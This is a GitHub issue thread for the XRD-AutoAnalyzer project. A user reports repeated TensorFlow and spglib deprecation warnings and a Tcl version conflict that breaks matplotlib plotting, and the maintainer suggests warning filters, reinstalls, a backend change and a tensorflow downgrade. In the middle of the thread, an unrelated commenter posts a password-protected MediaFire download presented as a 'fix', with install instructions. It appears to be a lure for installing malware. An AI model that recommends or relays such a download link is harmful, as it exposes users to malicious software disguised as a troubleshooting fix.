### ISSUE TITLE
Deprecation Errors in Tensorflow and spglib on Fresh Install

### ISSUE THREAD

**Issue by jcpeterson24** [njszym/XRD-AutoAnalyzer#9]
Hi there,

I downloaded and installed this code last week and I have since run the example CNN program several times. Every time I have run the example, I get these two warning messages repeatedly: 
1.  WARNING:tensorflow:From C:\Users\tankw\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\keras\src\backend\tensorflow\core.py:204: The name tf.placeholder is deprecated. Please use tf.compat.v1.placeholder instead.
2. C:\Users\tankw\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\spglib\spglib.py:115: DeprecationWarning: dict interface (SpglibDataset['hall_number']) is deprecated.Use attribute interface ({self.__class__.__name__}.{key}) instead
  warnings.warn(
These appear over and over every few seconds while the code is running, and each appears at least 20 times. They appear in between the outputs of the example.

**Comment by njszym** [comment]
Thanks for bringing this up. I was able to reproduce your second warning that is in relation to spglib. Regarding the first error, which I do not see on my system, can you let me know which version of tensorflow you are running?

As I look into this issue, one simple fix you can implement is adding the below lines to the beginning of the `run_CNN.py` script that you are executing:

`import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)`

This should prevent the warnings from being printed.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by jcpeterson24** [comment]
Thanks! It solved the spglib error but the tensorflow warning still appears.

I think the version of tensorflow I have installed is 2.17.0. That's from the metadata file in the package. Also, I have not been able to generate plots from the program as the version of Tcl I have is 8.6.13 and the program requires version 8.6.2.

Traceback (most recent call last):
  File "C:\Users\tankw\XRD-AutoAnalyzer-main\Example\run_CNN.py", line 141, in <module>
    visualizer.main('Spectra', spectrum_fname, phasenames, heights, final_spectrum,
  File "C:\Users\tankw\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\autoXRD\visualizer\__init__.py", line 522, in main
    plt.figure()
  File "C:\Users\tankw\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\matplotlib\pyplot.py", line 1027, in figure
    manager = new_figure_manager(
              ^^^^^^^^^^^^^^^^^^^
  File "C:\Users\tankw\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\matplotlib\pyplot.py", line 550, in new_figure_manager
    return _get_backend_mod().new_figure_manager(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\tankw\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\matplotlib\backend_bases.py", line 3507, in new_figure_manager
    return cls.new_figure_manager_given_figure(num, fig)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\tankw\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\matplotlib\backend_bases.py", line 3512, in new_figure_manager_given_figure
    return cls.FigureCanvas.new_manager(figure, num)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\tankw\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\matplotlib\backend_bases.py", line 1797, in new_manager
    return cls.manager_class.create_with_canvas(cls, figure, num)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\tankw\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0\LocalCache\local-packages\Python312\site-packages\matplotlib\backends\_backend_tk.py", line 483, in create_with_canvas
    window = tk.Tk(className="matplotlib")
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.12_3.12.1520.0_x64__qbz5n2kfra8p0\Lib\tkinter\__init__.py", line 2346, in __init__
    self.tk = _tkinter.create(screenName, baseName, className, interactive, wantobjects, useTk, sync, use)
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
_tkinter.TclError: Can't find a usable init.tcl in the following directories:
    {C:\Program Files (x86)\SIMPSON\tcl8.6} {C:/Program Files/WindowsApps/PythonSoftwareFoundation.Python.3.12_3.12.1520.0_x64__qbz5n2kfra8p0/lib/tcl8.6} {C:/Program Files/WindowsApps/lib/tcl8.6} {C:/Program Files/lib/tcl8.6} {C:/Program Files/WindowsApps/library} {C:/Program Files/library} {C:/Program Files/tcl8.6.13/library} C:/tcl8.6.13/library

C:/Program Files (x86)/SIMPSON/tcl8.6/init.tcl: version conflict for package "Tcl": have 8.6.13, need exactly 8.6.2
version conflict for package "Tcl": have 8.6.13, need exactly 8.6.2
    while executing
"package require -exact Tcl 8.6.2"
    (file "C:/Program Files (x86)/SIMPSON/tcl8.6/init.tcl" line 19)
    invoked from within
"source {C:/Program Files (x86)/SIMPSON/tcl8.6/init.tcl}"
    ("uplevel" body line 1)
    invoked from within
"uplevel #0 [list source $tclfile]"

**Comment by njszym** [comment]
Got it, thanks for the additional info. Your tensorflow version matches my own, so it's likely some dependencies that need to be upgraded. You could try forcing a reinstall tensorflow with all its dependencies:
`pip install --force-reinstall tensorflow`

If this doesn't work, you could specifically ignore warnings in tensorflow by adding the below line to your code:
`tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)`

Regarding the second error, you could try reinstalling matplotlib or using a different backend. For example, by adding:
```
import matplotlib
matplotlib.use('Agg')
```

**Comment by jcpeterson24** [comment]
Okay! I tried force reinstalling tensorflow and the error still appears. Can you tell me where I should place the line of code you gave me? I tried putting it at the start of run_CNN but it would't work.

On the second error, I tried force reinstalling matplotlib but that caused some issues with numba, pyxtal and tensorflow-intel because it changed the version of numpy I had installed. I corrected it by repeating the tensorflow reinstall. I added the code to change the backend for matplotlib to agg, and I got warnings regarding FigureCanvasAgg being non-interactive. I'm trying other backends now.

**Comment by njszym** [comment]
`tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)` can be placed near the top of:
`autoXRD/spectrum_analysis/__init__.py`

For the matplotlib backend, that should be specified in `autoXRD/visualizer/__init__.py`

**Comment by jcpeterson24** [comment]
Thanks! I added the line and tried running it again but the warning still appears. I ran the __init__.py file just to see it running it changed anything and I saw this:
WARNING:tensorflow:From C:\Users\tankw\XRD-AutoAnalyzer-main\autoXRD\spectrum_analysis\__init__.py:29: The name tf.logging.set_verbosity is deprecated. Please use tf.compat.v1.logging.set_verbosity instead.

**Comment by njszym** [comment]
I think the position of the line (`tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)`) matters, but not too sure. Are you placing it before all other tensorflow imports? Perhaps adding it to your `run_CNN.py` could also help, since that gets called first.

One other thought would be to downgrade tensorflow to 2.16, as this was the original version that autoXRD was built on.

**Comment by jcpeterson24** [comment]
I placed it after the tensorflow imports. I tried adding it to `run_CNN.py` and I added a tensorflow import to prevent errors from Python not recognizing `tf`. It just gave me the "The name tf.logging.set_verbosity is deprecated. Please use tf.compat.v1.logging.set_verbosity instead." warning instead. In other news, I got the plots to work!

**Comment by njszym** [comment]
Got it, thanks for the update. Have you tried downgrading tensorflow to version 2.16?

**Comment by njszym** [comment]
An update: I pushed a change that resolves the spglib warning, so now it is not necessary to force an ignore of that one.
